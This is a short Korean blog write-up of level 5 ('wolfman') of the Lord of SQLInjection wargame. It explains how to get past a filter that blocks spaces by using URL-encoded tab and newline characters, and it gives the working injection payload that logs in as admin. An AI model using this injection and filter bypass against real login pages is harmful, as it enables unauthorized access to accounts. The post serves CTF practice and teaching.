-
[Lord of SQLInjection] #5 wolfman[+] Security [+]/Lord of SQLInjection 2020. 5. 3. 04:36
드디어 5번 문제!
if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~"); 절을 보아 공백을 필터링해놓은 듯하다!
즉! 공백우회 문제!
해답은 간단하다
%0a : Line Feed (\n)
%0b, %0c
%0d : carracarriage return (\r)
%09 : Tap
등을 이용하여 공백을 대채할 수 있다!
짜란!
필자는 ?pw='%09or%09id='admin'%23 을 쿼리로 삽입하여 문제를 풀었다.
울프맨 컷!
'[+] Security [+] > Lord of SQLInjection' 카테고리의 다른 글
[Lord of SQLInjection] #7 orge (0) 2020.05.03 [Lord of SQLInjection] #6 darkelf (0) 2020.05.03 [Lord of SQLInjection] #4 orc (0) 2020.05.03 [Lord of SQLInjection] #3 goblin (0) 2020.05.02 [Lord of SQLInjection] #2 cobolt (0) 2020.05.02